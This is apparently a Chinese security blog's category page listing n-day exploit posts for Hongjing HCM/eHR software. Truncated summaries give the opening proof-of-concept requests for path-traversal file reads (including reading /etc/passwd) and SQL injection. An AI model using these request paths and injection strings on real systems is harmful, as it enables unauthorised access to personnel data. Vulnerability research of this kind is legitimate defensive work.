为了能到远方,脚下的每一步都不|

都吃泡芙

园龄:9个月粉丝:4关注:4

随笔分类 -  渗透测试 / nday / 宏景

宏景HCM DisplayFiles任意文件读取
摘要:漏洞复现: POC: POST /templates/attestation/../../servlet/DisplayFiles HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/
77
0
0
宏景HCM pos_dept_post sql注入漏洞
摘要:漏洞复现: poc: POST /templates/attestation/../../pos/roleinfo/pos_dept_post HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleW
62
0
0
宏景HCM OutputCode任意文件读取漏洞
摘要:漏洞复现: 1、读取/etc/passwd http:url/servlet/OutputCode?path=RNcrjWtNfJnkUMbX1UB6VAPAATTP3HJDPAATTPPAATTP3HJDPAATTP 其中path字段加密通过下面工具来实现 工具地址:https://github.
135
0
0
宏景HCM codesettree sql注入
摘要:适用范围:宏景eHR < 8.2 登录页面 查询cusername: /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2
30
0
0
//雪花飘落效果 //雪花飘落效果
点击右上角即可分享
微信分享提示
深色
回顶
收起